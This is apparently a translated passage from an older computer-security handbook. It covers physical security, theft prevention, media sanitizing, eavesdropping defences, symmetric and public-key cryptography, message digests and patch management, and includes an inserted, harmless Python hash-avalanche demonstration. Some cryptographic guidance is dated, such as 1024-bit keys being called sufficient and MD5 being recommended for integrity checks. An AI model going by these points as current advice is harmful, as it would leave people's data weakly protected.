Some high-security installations use double-walled, shielded conduit with pressurized gas between the layers. If the pressure between the walls drops, pressure sensors on the conduit stop the traffic on the lines or sound an alarm. This happens, for example, when someone makes a hole in the walls of the conduit.

Network connectors

In addition to cutting a cable, an attacker who has access to a network terminator, or to a network connector, can knock the system out electrically or damage the network. All wired networks are vulnerable to high-voltage attacks.

Utility connections

In many buildings, the electricity, gas, and water can easily be shut off, sometimes even from outside the building. Because computers need electrical power, and because temperature control systems may depend on gas heating or water cooling, these connections give vandals additional points of attack.

Defending against acts of war and terrorism

Because it is impossible to defend against many attacks, consider a system of hot backups and mirrored disks and servers. With a reasonably fast network connection, you can arrange for files stored on one computer to be copied simultaneously to another system across town or on the other side of the world. Sites that cannot have simultaneous backup can make hourly or nightly incremental dumps. Although a suicide bombing might destroy your computer center, your data can be safely protected elsewhere.

Preventing theft

Having a computer stolen, especially a laptop, can be a distressing experience; and if the computer contains information that is irreplaceable or extremely sensitive, it can be very costly for the victim.

Many computer systems are stolen for resale, either as complete systems or, if the thieves are sophisticated, as individual components, which are harder to trace. Some computers are stolen by people who cannot afford to get one for themselves. Others are stolen for the information stored on them, usually by people who want to obtain that information, and sometimes by people who want to deprive the computer's owner of its use. No matter why a computer is stolen, most computer thefts have one element in common: opportunity. In many cases, computers were stolen because they were left unprotected.

Laptops and other portable computers present their own risks. They are easily stolen, difficult to tie down (otherwise they would no longer be portable!), and easily resold. People who use laptops should be trained to be especially vigilant in protecting them. Theft of these computers, particularly in airports, is reported to be a major problem at present. Laptops should never be left unattended anywhere, for any length of time. If you are traveling by taxi, keep your laptop with you rather than in the trunk.

Fortunately, by taking a small number of simple, inexpensive measures, you can greatly reduce the risk of laptop or desktop theft.
Locks

One good way to protect a computer from theft is to secure it physically. A variety of physical tie-down devices are available for fastening computers to desks and cabinets. Although these devices cannot prevent theft, they make it more difficult.

Easy portability is a major selling point of laptops, and it is also the main reason they are stolen. One of the best ways to reduce the chance of your laptop being stolen is to lock it, at least temporarily, to a desk, a pipe, or some other large object.

Most laptops sold today are equipped with a security slot. For less than $50 you can buy a cable lock that locks the laptop's security slot to a nearby object. Once the machine is locked to something, it cannot be removed without the key or without damaging the machine, and a damaged computer is much harder to resell. Locks of this kind mainly prevent laptops from being snatched by street thieves.

Tagging

Another way to reduce the chance of theft and increase the likelihood that a laptop is returned is to engrave a name and telephone number on it, or to tag it with permanent or semipermanent labels. Such tags make it very hard for buyers or sellers to claim they did not know the computer was stolen.

The tags of a good tagging system are clearly visible and carry a unique serial number that lets the organization track its property. One low-cost tagging system is produced by Secure Tracking of Office Property (STOP) [58]. These tags are assigned a unique serial number and come with three years of support in Europe, Australia, Latin America, and North America. If a piece of equipment with a STOP tag is found, the company can arrange for it to be returned to its rightful owner.
[58] Secure Tracking of Office Property (http://www.stoptheft.com)

Laptop recovery software and services

Several companies now sell "tracking" software for personal computers. The tracking program hides in several places on the laptop and from time to time places a call to the tracking service to report its location. The call may be made over a telephone line or a network connection. Normally these calls are ignored, but if the laptop has been registered as "stolen" with the tracking service, the police are notified of the location of the stolen property.

Many of these systems work on desktop machines as well as laptops, so you can use them to protect any system that you believe is at high risk of being stolen.

Component theft

When RAM prices were high, businesses and universities suffered from a series of RAM thefts. Many computer companies and universities have also experienced large thefts of advanced processors. RAM and the latest processors are easily sold on the open market. These processors are untraceable, and when thieves steal only part of the RAM inside a computer, weeks or months may pass before the theft is noticed. If a user complains that a computer is suddenly running much more slowly than it did the day before, check its RAM, and then check whether its case is physically secured.

Encryption

If your computer is stolen, the information on it will be used to serve the purposes of the computer's new owners. They may erase the information or they may read it. Sensitive information may be sold, used in defamatory mailings, or used to compromise other computers.
You can never make something completely theft-proof, but you can make stolen information virtually useless: it is enough that the machine is encrypted and the thief does not know the encryption key. For this reason, even with the best computer security mechanisms and physical deterrents, sensitive information should be encrypted with an encryption system that is difficult to break. We recommend using a strong encryption system so that, even if your computer is stolen, the sensitive information it contains cannot easily be misused.

Protecting information

There is a great deal of overlap between the physical security of your computer equipment and the confidentiality, integrity, and accuracy of your data. After all, if someone steals your computer, they naturally have its data as well. Unfortunately, your data is exposed to a variety of attacks that can defeat the physical measures described in the preceding sections.

Eavesdropping

Electronic eavesdropping is perhaps one of the most sinister forms of illicit data disclosure. Even with the most ordinary equipment, an eavesdropper can make a complete transcript of a victim's actions: every keystroke and every piece of information displayed on the screen or sent to the printer. Meanwhile the victim usually has no idea of the attacker's presence and goes on working unsuspectingly, exposing not only sensitive information but also the passwords and procedures needed to obtain even more.

Tools exist for eavesdropping at many points around a computer: the connection between the keyboard and the computer, data cables and wiring, Ethernet and fiber-optic networks, wireless networks, and even the radio emissions of the equipment. There are several ways to make eavesdropping more difficult:

• Routinely inspect data cables and wires for physical damage or alteration, and consider using shielded or armored cable to make tapping more difficult. If you are very security conscious, run your cables through steel conduit.
• Make sure that unused offices do not have live Ethernet ports. Use Ethernet switches instead of Ethernet hubs. Use LAN monitoring software such as arpwatch, which detects packets with previously unseen MAC addresses [59], or use switches that can filter packets by MAC address. Wherever possible, use fiber-optic cable instead of copper cable, because it is harder to tap covertly.
• Avoid using wireless networks. If you must build a wireless network, enable every available security feature for defense in depth (such as encryption, firewalls, disabling SSID broadcasts, MAC filtering, and so on). Because most of these features provide very little security, train users always to use a VPN or another encrypted tunnel on the wireless network. Place the wireless access point outside your firewall (or between two firewalls).
• Encryption provides significant protection against eavesdropping. Always assume that your communications are being monitored, and treat encryption of all communications as a requirement. Where that is not possible, at least encrypt all sensitive network traffic (such as the usernames and passwords for remote services).

Protecting backups

Backups should be a prerequisite of any computer operation, secure or otherwise, but the information stored on backup tapes is extremely vulnerable. Protect your backups at least as well as you normally protect your computers. Never leave them unattended in a publicly accessible area, keep them in physically secure locations (preferably somewhere away from where your computers are kept), and be careful whom you trust to carry them from one place to another.

Most backup programs allow you to encrypt the data before it is written to the backup.
Encrypted backups greatly reduce the chance that stolen backup discs or tapes will be of any use to an adversary. If you encrypt your backups, make sure you also protect the encryption key, both so that an attacker cannot find it and so that the key is not lost when staff change.

Backups in archives are sometimes slowly erased by environmental conditions. Magnetic tape, for example, is susceptible to a process called print-through, in which the magnetic fields of one layer wound on the reel affect the layers beneath it. The only way to find out whether this is damaging a backup is to check the backups from time to time.

[59] The fixed physical address of each node on the network.

A very common problem is poor labeling and inventory of backup media. You may choose whatever labeling or cataloging system you find effective, provided that you choose one and document it fully.

Sanitizing Media Before Disposal

When you retire disk drives, discs or tapes, make sure the data on the media has first been completely erased. This process is called sanitizing. Simply deleting a file on your hard disk in the ordinary way does not destroy the file's data. Usually parts of the original data, and sometimes the whole file, can easily be recovered. Hard disks must be sanitized with special software written specifically for each type of drive.

For tapes you can use a degausser or bulk eraser, a hand-held electromagnetic device with a strong magnetic field. Read back tapes that you have bulk-erased often enough to learn how many passes with this method are needed to obliterate the data.
Software exists for overwriting optical media, which erases the contents even of write-once media. However, the effectiveness of these methods varies from one type of media to another, and overwriting may still leave residues. For this reason physical destruction may be preferable.

Incinerators and acid baths are very suitable for destroying tapes, but they are not environmentally acceptable. Until recently, breaking hard disks and floppy disk packs was preferred, but as disk capacity grows, drives must be broken into ever smaller pieces so that laboratory analysis of the resulting material is not possible. Degaussers exist for disk drives, but they are expensive. As a result, physical sanitizing and destruction methods are gradually losing ground to software techniques.

One common sanitizing method is to overwrite the entire disk or tape. If you deal with highly confidential or security-related information, you may want to overwrite a tape or disk several times, because data can be recovered from tapes that have been overwritten only once. Tapes are usually overwritten three times: once with blocks of zeros, once with blocks of ones, and once with random numbers. Finally, the tape can be run through a band saw several times to turn it into thousands of small pieces of plastic.

Sanitizing Printed Documents

Printed information that goes into the trash may contain information useful to criminals or competitors. This includes printouts of software (including incomplete versions), memos, design documents, preliminary code, planning documents, internal newsletters, company phone books and manuals, and other items. Other information that may end up in the trash includes the types and versions of operating systems and computers, serial numbers, patch levels, and the like. These documents may contain host names, IP numbers, user IDs and other information vital to an attacker. Some companies are said to throw away complete listings of firewall configurations and filtering rules, a gold mine for anyone trying to break into their computers, with no particular care.

Buy a paper shredder for every place where valuable information is discarded. Train users not to throw sensitive information into household trash but to bring it to the office to be shredded. If your organization is large enough and the law permits, you may want to incinerate some sensitive paper waste on the premises.

Protecting Local Storage

In addition to computers and mass-storage systems, many other pieces of electronic data-processing equipment store information. Terminals, modems and laser printers, for example, usually have memory buffers that can be loaded or unloaded with appropriate control commands.

Naturally, any piece of memory that stores sensitive information presents a protection problem, especially if it is not protected by a password, encryption or a similar mechanism. Local storage in many devices presents an additional security problem, however, because sensitive information is copied into these memories from time to time without the computer user's knowledge.

Unattended Terminals

Unattended terminals where users have left themselves logged in are very attractive to vandals and computer attackers. A vandal can access the person's files with impunity. Alternatively, the vandal can use the person's account as a starting point for an attack against the computer system or the whole network: any tracing of the attack will naturally point to the owner of the account, not to the vandal. Terminals should never be left unattended for more than short periods of time.

Some systems or screen savers can automatically log a user out, or at least blank the screen and lock the keyboard, when the user's terminal has been idle for more than a few minutes. Take advantage of these features.

Key Switches

Some kinds of computers have a key switch that can be used to prevent the system from being rebooted in single-user mode. Some computers also have ROM monitors that prevent the system from being rebooted in single-user mode without a password. Sun's OpenBoot system and all new Macintosh systems support passwords for controlling access to the boot configuration.

Key switches and ROM monitor passwords provide additional security and should be used whenever possible [66]. It should nevertheless be remembered that anyone can disrupt a computer simply by unplugging it. The most important way to protect a computer, therefore, is to restrict physical access to it.

[66] There is another good reason to use ROM monitor passwords. Consider what could happen if an attacker gained access to a computer, set a password on it, and then switched it off.

Chapter Four
Information Security

Overview

This chapter focuses on mechanisms that protect information from unintended disclosure, alteration or destruction. These aspects of security are usually called confidentiality [67], which prevents unauthorized users from accessing or changing data and programs, and system integrity, which ensures that information and software remain intact and correct. The discussion in this chapter is largely conceptual, although examples of how several of the principles are applied in real systems are given.
[67] Or privacy, a term that is sometimes used interchangeably with "confidentiality" and sometimes refers more specifically to the protection of individuals' personal information.

Cryptography

Cryptography is a collection of mathematical techniques for protecting information. Using cryptography, written words and other kinds of messages can be transformed so that they appear meaningless to anyone who does not possess the special mathematical key needed to unlock them. Using cryptography to disguise a message is called encryption. The process of returning an encrypted message to its original form with the appropriate key is called decryption.

Cryptography is used to prevent an unauthorized recipient from gaining access to information. In theory, once a piece of information has been encrypted, its security is not compromised if it is accidentally intercepted or disclosed by a third party, provided that the key needed to decrypt it has not been disclosed and that the encryption method resists attempts to decrypt without the key.

Besides improving confidentiality, cryptography is also used to ensure message integrity and non-repudiation.

Cryptographic Algorithms and Functions

There are basically two kinds of encryption algorithm:

Symmetric key algorithms

In these algorithms the same key is used to encrypt and to decrypt the message. Symmetric key algorithms are sometimes called secret key algorithms and sometimes private key algorithms. Unfortunately, both of these names are easily confused with public key algorithms, which are unrelated to symmetric key algorithms. Symmetric key algorithms can be divided into two categories: block algorithms and stream algorithms. Block algorithms encrypt data one block (a number of bytes) at a time, whereas stream algorithms encrypt it byte by byte (or even bit by bit).
Symmetric key algorithms are the workhorses of modern cryptographic systems. They are generally much faster than public key algorithms and somewhat easier to implement. Unfortunately, symmetric key algorithms have three problems that limit their use in the real world:

• For two parties to exchange information securely with a symmetric key algorithm, they must first exchange an encryption key. Exchanging an encryption key securely can be very difficult.

• Because they want to send or receive messages, both parties must hold a copy of the key and keep it secure. If one party's key is compromised and the other party does not know it, the second party may send a message to the first, and that message can then be abused using the compromised key.

• If every pair of users wants to secure its communication with such an algorithm, each pair needs its own unique key, which for N different users requires (N^2 - N) / 2 keys. As the number of users grows, this number quickly becomes unmanageable.

Asymmetric key algorithms

In these algorithms one key is used to encrypt the message and a different key to decrypt it. Public key cryptosystems are an important class of asymmetric key algorithms. In these algorithms the encryption key is usually called the public key, because it can be made available to everyone without compromising the secrecy of the message or of the decryption key. The decryption key is usually called the "private key" or "secret key".

By separating the encryption and decryption keys, public key algorithms largely solve the problems of symmetric key algorithms. In theory, public key technology makes it relatively easy to send someone an encrypted message. People who wish to receive encrypted messages publish their public keys in public listings or directories so that they are easy to obtain. To send an encrypted message, all we then need to do is find the person's public key, encrypt the message, and send it. In a good public key system the only person who can decrypt the message is the one who holds the corresponding private key. Moreover, the only thing we need to store on our own machine is our own private key.

Public key cryptography is also used to create digital signatures. Like a handwritten signature, a digital signature can be used to show an identity. Just as with paper letters, you can sign an electronic message to assure others that you wrote it; and just as you would sign a bill of sale, you can sign a transaction document electronically to show that you wish to order or sell goods. In public key technology the private key is used to create the digital signature, and others can then use the corresponding public key to verify that the signature is genuine.
Unfortunately, public key algorithms are computationally expensive. In practice, public key encryption and decryption require about 1000 times the computing power of an equivalent symmetric key encryption algorithm. To obtain the benefits of public keys as well as the speed of symmetric cryptosystems, most modern encryption systems in fact use a combination:

Hybrid public/private cryptosystems

In these systems the slower public key encryption is used to exchange a random session key, which is then used as the basis for a symmetric private key algorithm. (A "session key" is used for only a single encryption session and is then discarded.) Almost all practical implementations of public key cryptography are hybrid systems.

Finally, there is a special class of functions that is almost always used together with public key cryptography. These algorithms are not encryption algorithms as such; they are used to create a "fingerprint" of a file or a key:

Message digest functions

A message digest function generates a seemingly random pattern of bits for any input. The digest value is computed in such a way that finding an input that produces a given digest exactly is computationally infeasible. Message digests are often called "file fingerprints". Most systems that perform digital signatures encrypt a message digest of the data rather than the file's actual data.
Cryptographic Strength of Symmetric Algorithms

Different encryption algorithms are not equal in strength. Some systems are not very good at protecting data and allow encrypted information to be decrypted without knowledge of the required key. Others are highly resistant to even the most determined attacks. The ability of a cryptosystem to protect information against attack is called its strength. Strength depends on many factors, including:

• The secrecy of the key;

• The difficulty of guessing the key or of trying all possible keys (a key search). Longer keys are usually harder to find or guess;

• The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the algorithm);

• The absence of back doors, or other conditions that make it easier to decrypt an encrypted file without knowing the decryption key;

• The impossibility of decrypting an entire encrypted message when you know how part of it decrypts (known as a known plaintext attack); and

• The properties of the plaintext and an attacker's knowledge of them. For example, a cryptosystem may be vulnerable to attack if all messages encrypted with it begin or end with a known piece of plaintext.
In general, cryptographic strength is never proved; it is only disproved. When a new encryption algorithm is proposed, its inventor almost always believes that it offers perfect security, that is, that there is no way to decrypt an encrypted message without the corresponding key. After all, if the algorithm had a known flaw, the inventor would not have proposed it in the first place (or at least would not have proposed it in good conscience).

As part of examining an algorithm's strength, a mathematician can show that the algorithm resists particular kinds of attack that have previously been used to expose flaws in other algorithms. Unfortunately, even an algorithm that resists every known attack is not necessarily secure, because new kinds of attack are developed all the time.

From time to time, individuals or organizations claim to have invented symmetric encryption algorithms that are far more secure than existing ones. Generally, such claims should be treated with caution. Since there is currently no known attack against the encryption algorithms that are in wide use today, there is no reason to use new and untested encryption algorithms, which may have hidden flaws.

Key Length in Symmetric Key Algorithms

Short keys can significantly compromise the security of encrypted messages, because an attacker can decrypt the message with every possible key until the content is recovered. But while short keys provide relatively little security, very long keys do not necessarily provide much more security in practice than keys of moderate length. That is, although 40-bit to 56-bit keys are not very secure, a 256-bit key does not offer significantly more security than a 168-bit or even a 128-bit key.
If you are trying to decrypt a message and do not have a copy of the key, the simplest way to decrypt it is a brute force attack. These attacks are also called "key search attacks", because they try every possible key to see whether it decrypts the message. If the key is chosen at random, the attacker will on average need to try half of all possible keys to find the actual decryption key.

Inside a computer, a cryptographic key is represented as a string of binary digits. Each binary digit can be 0 or 1. In general, each bit added to the key doubles the number of keys. The question of "how many bits are enough for a secure key" therefore depends on how fast the attacker can try different keys and how long you want to keep your information secure. If the attacker can try 10 keys per second, a 40-bit key will protect a message for more than 3484 years. Of course, today's computers can try many thousands of keys per second, and with special hardware and software hundreds of thousands. Key search speed can be increased still further by running the same program on hundreds or thousands of computers at once. With today's technology, therefore, it is feasible to search more than a million keys per second.
If you can try a million keys per second, you can search all 40-bit keys in only 13 days. If a 40-bit key is so clearly insufficient to keep information secure, how many bits does a secure key need? If you could try a billion keys per second, trying all 80-bit keys would still take 38 million years. Trying all 128-bit keys would take 10^22 years with today's technology, and hundreds of millions of years even with advances in quantum computing. Given that our sun is likely to become a red giant within the next 4 billion years and in doing so will destroy the Earth, and assuming there is no other weakness in the algorithm used, a 128-bit encryption key should be sufficient for most cryptographic applications!

Common Symmetric Key Algorithms

Many symmetric key algorithms are in use today. Some of those most widely used in computer security are summarized below [82].

DES

The Data Encryption Standard (DES), adopted as a U.S. government standard in 1977 and as an ANSI standard in 1981, is a block cipher that uses a 56-bit key and has several modes of operation depending on the purpose for which it is used. DES is a strong algorithm, but its short key length limits its use today. In 1998 a special-purpose machine for cracking DES was built by the Electronic Frontier Foundation (EFF) for less than 25,000 dollars, and in a public demonstration it found the key to an encrypted message in less than a day, before a coalition of computer users from around the world.
Triple-DES

Triple-DES is a way of making DES dramatically more secure by applying the DES encryption algorithm three times with three different keys, for a total key length of 168 bits. Also known as "3DES", this algorithm has been widely used by financial institutions and by the Secure Shell (SSH) program. In theory, using DES twice with two different keys does not improve security as much as one might at first expect, because of a known plaintext attack called meet-in-the-middle, in which the attacker simultaneously tries to encrypt the plaintext with a single DES operation and to decrypt the ciphertext with another single DES operation until a match is found in the middle.

Blowfish

Blowfish is a fast, compact and simple block encryption algorithm invented by Bruce Schneier. The algorithm allows a variable-length key of up to 448 bits and is optimized for execution on 32-bit and 64-bit processors. The algorithm is unpatented and has been placed in the public domain. Blowfish is used in the Secure Shell and other similar programs.

IDEA

The International Data Encryption Algorithm (IDEA) was developed in Zurich, Switzerland, by James L. Massey and Xuejia Lai and published in 1990. IDEA uses a 128-bit key and is used by the popular PGP program to encrypt files and electronic mail. Unfortunately, wider use of IDEA has been limited by a series of software patents on the algorithm, currently held by Ascom-Tech AG in Solothurn, Switzerland.

[82] A more complete list of these algorithms appears on pages 169 to 176 of "Practical Unix & Internet Security" (PUIS), published by O'Reilly.
RC4

This stream cipher was originally developed by Ronald Rivest and kept as a trade secret by RSA Data Security. The algorithm was revealed by an anonymous Usenet posting in 1994 and appears to be reasonably strong. RC4 uses keys of between 1 and 2048 bits.

Rijndael (AES)

This algorithm was developed by Joan Daemen and Vincent Rijmen and was chosen in October 2000 by the National Institute of Standards and Technology (NIST) as the new U.S. Advanced Encryption Standard. Rijndael is an extraordinarily fast and compact cipher that can use keys of 128, 192 or 256 bits.

Cryptographers evaluate the strength of their algorithms through comparative review. When an algorithm is published, other cryptographers look for flaws or weaknesses in it. Do not trust people who claim to have invented a new encryption algorithm, because if they do not want to reveal how their algorithms work, it may be because doing so would undermine the algorithms' credibility. In practice there is no reason to keep an algorithm secret, because real security lies in openness.

On the other hand, it is important to understand that merely publishing an algorithm or a piece of code does not guarantee that its flaws will be found. The WEP encryption algorithm introduced by the 802.11 networking standard was in use for years before a significant flaw was found in it; the flaw had been there all along, but no one had run into a problem that prompted a search for one.
One-Time Pads

One symmetric key cryptosystem that is provably unbreakable is the "one-time pad". In this kind of algorithm the communicating parties share a key consisting of a long string of random bytes (longer than the message to be sent). The message is encrypted and decrypted by transforming each byte of the message with one byte of the key, after which that key byte is destroyed and never used again. Because the key is random and never repeats, even a key search attack is impractical, since any possible message can be produced by some particular key.

Unfortunately, these algorithms have many limitations that make them impractical. In addition to the usual problems of symmetric encryption (exchanging and storing keys securely), generating large amounts of truly random data is not always easy, and distributing large amounts of key material can also be troublesome. Nevertheless, the system is used to some extent for communication links that require extremely high security.

Public Key Algorithms

Public key algorithms are harder to devise than symmetric key algorithms, and fewer of them are in use. Because the keys of symmetric and asymmetric encryption algorithms are used in fundamentally different ways, the relative strength of these algorithms cannot be inferred by comparing key lengths. Key lengths in public key algorithms usually range from 512 to 2048 and 4096 bits, and for many users a length of 1024 bits is sufficient for the foreseeable future. The following list summarizes the public key systems in common use today:

Diffie-Hellman

A system for exchanging cryptographic keys between communicating parties. Diffie-Hellman is not actually an encryption and decryption method, but a method of developing and exchanging a shared private key over a public communication channel. In effect, the two parties agree on some common numerical values, and then each party creates a key. Mathematical transformations of the keys are exchanged, and each party can then compute a third session key that cannot easily be derived by an attacker who knows both exchanged values.

DSA/DSS

The Digital Signature Standard (DSS) was developed by the U.S. National Security Agency (NSA) and adopted by the National Institute of Standards and Technology as a Federal Information Processing Standard (FIPS). DSS is based on the Digital Signature Algorithm (DSA). Although DSA allows keys of any length, only keys between 512 and 1024 bits are permitted under the DSS FIPS. As specified, DSS can be used only for digital signatures, although an implementation of DSA can also be used for encryption.

Elliptic curves

Elliptic curve cryptosystems are public key encryption systems that are based on elliptic curves rather than on the traditional logarithmic functions. Their advantage stems from the fact that no tractable algorithm is known for computing discrete logarithms of elliptic curves. For this reason short keys in elliptic curve cryptosystems can provide a high degree of confidentiality and security, and their computations are also very fast. Elliptic curves can also be implemented very efficiently in hardware.

RSA

RSA is a well-known public key cryptosystem developed in 1977 by three MIT professors: Ronald Rivest, Adi Shamir and Leonard Adleman. RSA can be used both to encrypt information and as the basis of a digital signature system. Digital signatures can be used to prove the authenticity or provenance of digital information. In this system the key can be of any length, depending on the particular implementation used.

Message Digest Functions

Message digest functions distill the information in a file (large or small) into a single large number, usually 128 to 256 bits long. The best message digest functions have the following properties:

a) Every bit of the function's output is potentially influenced by every bit of its input.

b) If any given bit of the function's input is changed, every output bit has a 50 percent chance of changing.

c) Given an input file and its corresponding message digest, it should be computationally infeasible to find another file with the same message digest value.

In theory, two different files can have the same message digest value. This is called a collision. For a message digest function to be secure, it must be computationally infeasible to find or produce such collisions.

Many message digest functions have been proposed and are now in use. A few examples follow:

MD2

Message Digest #2, developed by Ronald Rivest. This message digest function is the most secure of Rivest's message digest functions, but it also takes the longest to compute. As a result, MD2 is rarely used. MD2 produces a 128-bit digest.

MD4

Message Digest #4, also developed by Ronald Rivest. This message digest algorithm was invented as a faster alternative to MD2. MD4 was subsequently shown to have potential weaknesses: it may be possible to find a file that produces the same MD4 digest as a given file without a brute force search (which is itself impractical, for the same reason that searching a 128-bit key space is impractical). MD4 also produces a 128-bit digest.
MD5

Message Digest #5, also developed by Ronald Rivest. MD5 is a modification of MD4 that uses techniques designed to make it more secure. Although MD5 is widely used, in the summer of 1996 several flaws were discovered in it that allowed certain kinds of collisions to be computed in a weakened form of the algorithm. As a result, MD5 is slowly falling out of favor. Both MD5 and SHA-1 are used in SSL and in Microsoft's authentication technology. MD5 also produces a 128-bit digest.

SHA

The Secure Hash Algorithm is related to MD4 and was designed for use with the National Institute of Standards and Technology's Digital Signature Standard (NIST's DSS). Shortly after SHA was published, NIST announced that it was not suitable for use without a small change. SHA produces a 160-bit digest.

SHA-1

The revised Secure Hash Algorithm incorporates minor changes from SHA. It is not publicly known whether these changes make SHA-1 more secure than SHA, although many people believe that they do. SHA-1 also produces a 160-bit digest.

SHA-256, SHA-384, SHA-512

These 256-bit, 384-bit and 512-bit hash functions are designed for use with 128-bit, 192-bit and 256-bit encryption algorithms, respectively. They were proposed by NIST in 2001 for use with the Advanced Encryption Standard.

Besides these functions, it is also possible to use traditional symmetric block encryption systems such as DES as message digest functions. To use an encryption function as a message digest function, simply run it in cipher feedback mode. For the key, use a randomly chosen key dedicated to this purpose. Encrypt the entire input file. The last block of encrypted data is your message digest. Symmetric encryption algorithms produce excellent hashes, but they are much slower than the message digest functions described above.
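The second property listed for good message digest functions (a single changed input bit gives every output bit a 50 percent chance of changing) can be measured directly. The Python code below is an added example, not part of the handbook; the function names and the sample message are constructed for illustration, and the 16-bit additive checksum is included only as a contrast with real digest functions.

```python
import hashlib

# Constructed sample input; any byte string works.
MESSAGE = b"Constructed sample message for the digest property check."


def sha1(data):
    return hashlib.sha1(data).digest()


def sha256(data):
    return hashlib.sha256(data).digest()


def byte_sum16(data):
    """A naive 16-bit additive checksum, included only as a contrast."""
    return (sum(data) & 0xFFFF).to_bytes(2, "big")


def flip_bit(data, index):
    """Return a copy of data with bit number `index` inverted."""
    out = bytearray(data)
    out[index // 8] ^= 1 << (index % 8)
    return bytes(out)


def avalanche(digest_fn, message):
    """Flip each input bit in turn and compare the digest with the original.

    Returns (digest width in bits,
             mean fraction of output bits that changed per single-bit flip,
             number of output bits that never changed in any trial).
    """
    base = digest_fn(message)
    width = len(base) * 8
    trials = len(message) * 8
    changed_total = 0
    ever_changed = bytearray(len(base))
    for i in range(trials):
        digest = digest_fn(flip_bit(message, i))
        for j, (x, y) in enumerate(zip(base, digest)):
            diff = x ^ y
            changed_total += bin(diff).count("1")
            ever_changed[j] |= diff
    never = width - sum(bin(b).count("1") for b in ever_changed)
    return width, changed_total / (width * trials), never


if __name__ == "__main__":
    rows = (("SHA-1", sha1), ("SHA-256", sha256), ("16-bit sum", byte_sum16))
    for name, fn in rows:
        width, fraction, never = avalanche(fn, MESSAGE)
        print(f"{name:10s} {width:3d} bits  mean change {fraction:.3f}  "
              f"bits never changed {never}")
```

For the real digest functions the mean change sits close to one half and no output bit is left untouched, whereas the additive checksum changes only a few low-order bits, which is why it cannot serve as a fingerprint.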
Message digest functions are a powerful tool for detecting very small changes in very large files or messages. Compute the MD5 code for your message and set it aside; later, if you think the file has been changed (deliberately or accidentally), simply recompute the MD5 code and compare it with the MD5 you computed the first time. If they match, you can assume with a high degree of confidence that the file has not changed.

Because of their properties, message digest functions are also an important part of the cryptographic systems in use today. Message digests are the basis of most digital signature standards. Today's digital signature standards specify that, instead of signing the entire document, it is enough to sign a message digest of the document.

Message digests can also readily be used for message authentication codes (MACs), which use a secret shared between the two parties to prove that a message is authentic. MACs are appended to the end of the message to be verified. (RFC 2104 describes how to use keyed hashing for message authentication.) MACs based on message digests provide additional cryptographic security for Internet routing protocols.

Maintaining Integrity

Maintaining the integrity and correctness of the information stored on computers is vital to overall security and reliable operation. You must be sure of the integrity of your operating system, of your application programs, and of your data. For operating systems and applications, this entails not only monitoring your software for unwanted changes but also applying the patches and security fixes needed to keep the software secure.

Keeping Systems Up to Date

From the moment a workstation or server is connected to the Internet, it is exposed to probes and access attempts by uninvited outsiders. Attackers find new Internet hosts with astonishing speed. Reported details can be found on the web site maintained by the Honeynet Project, http://project.honeynet.org/. In one case, a newly configured Honeynet system was successfully penetrated only 15 minutes after being placed on the network. Every system that goes onto a network must therefore be kept up to date with security fixes, both before it is connected and afterwards.

Software Management Systems

A software management system is a set of tools and procedures for keeping track of which versions of which software are installed and whether any local changes have been made to the software or its configuration files. Without such a system it is impossible to know whether a piece of software needs to be updated or which local changes have been made and need to be preserved after an update. Using a software management system to keep the system up to date is vital for security purposes and also useful for non-security upgrades.

Fortunately, nearly all Unix systems and Windows NT-based systems provide some form of software management for the core components of the operating system and the applications distributed with it. At present the most common approach is to use "managed packages", precompiled executables and supporting files, which can examine the system themselves to determine which of the executables can be installed.
Package-Based Systems

A typical software package is a file containing a set of precompiled executable programs, together with any related files such as libraries, default configuration files, and documentation. Under most package systems, the package also carries metadata such as:

• Version information for the software contained in the package;
• Information about compatible operating system versions or hardware architectures;
• A list of other packages that this package requires;
• A list of other packages with which this package conflicts;
• A list of which files are configuration files (or a list of files that the user may change after installation); and
• Commands to be run before, during, and after installation of the files in the package.

The other important component of a package-based system is a database of the versions of the packages that have been installed on the system. On Windows systems the Registry usually serves this purpose.

Package-based systems are easy to use. With one or two simple commands, a system administrator can install new software, or upgrade current software when a new or patched version is released. Because the package's executables have already been compiled for the target operating system and hardware platform, the administrator does not need to spend time configuring the program.

On the other hand, packages are compiled to work with the typical configuration of the operating system, and not necessarily with the configuration you use. If you need to tune your programs to work with a particular kind of hardware, adapt them to an unusual authentication system, or simply want to run a program with a custom configuration, the source code, if it is available, will probably serve you better. The kernel of Unix operating systems is a good example of this.
On commercial systems that do not provide source code, package-based management appears more suitable than other methods. For example, Solaris 2.x provides the commands pkgadd, pkgrm, pkginfo, showrev (and other similar commands) for adding, removing, and querying the status of packages from the shell, and the admintool command for managing software in a graphical environment. Windows systems use the WindowsUpdate web site to download and install update fixes for the operating system and its core facilities.

Package management is not exclusive to commercial systems. Free-software Unix-based distributions also provide software management systems to make it simpler for administrators to keep systems up to date. Several Linux-based distributions have adopted the RPM package management system (RPM Package Management). This system uses a single command, rpm, for all of its package management tasks. Debian GNU/Linux uses an alternative package management system called dpkg. BSD-based Unix systems focus on source-based updates, but at the same time provide a collection of precompiled packages that are managed with the commands pkg_add, pkg_delete, and pkg_info.

Source-Based Systems

Unlike package-based systems, source-based systems usually emphasize helping the system administrator maintain an up-to-date copy of the source code of the operating system or application, from which new executables can be compiled and installed.

Source-based management is preferable to package management in several respects. A source-based update is released in only a single version, as opposed to compiled packages, which must be compiled and packaged separately for every computer architecture or operating system on which the software runs. Also, if local changes need to be made to the source code, only source-based systems can be used.
From a security standpoint, building packages from source code can be a mixed blessing. On the one hand, you are free to inspect the source code and make sure that it contains no hidden flaws or Trojan horses. In practice this inspection is difficult and is rarely done. On the other hand, if an attacker can gain access to your source code, it will not be very hard for the attacker to add Trojan horse code to it! To avoid this problem, you must make sure both that the source code you compile belongs to a trustworthy application and that the copy of the source code you hold is a trusted one.

Source Code and Patches

The simplest way to manage source code is to keep the application's source code available on the system and recompile it whenever it changes. When a fix for an application is released, it usually takes the form of a patch diff: a file that describes which lines of the program in the old version must be changed, deleted, or added to produce the new version. The diff program generates these files, and the patch program applies them to the old version so that, once the update has been carried out, the new version is created. After patching the source code, the system administrator compiles the application and reinstalls it.

For example, FreeBSD and related versions of Unix distribute a great many applications in their ports collections. An application in the collection consists of the original source code together with a set of patches that have been applied to improve the application's integration into the BSD environment. The makefiles build the application automatically, install it, and then register the application's files with the corresponding BSD command (pkg_add). On FreeBSD systems this approach is used extensively to maintain third-party software.
CVS

Another way to manage source code is to store it on a server using a source code version control system such as the Concurrent Versioning System (CVS), and to configure the server to allow anonymous client connections. Users who want to bring their source code up to the latest release use the CVS program to check out the latest revision, after which the updated source can be compiled and installed.

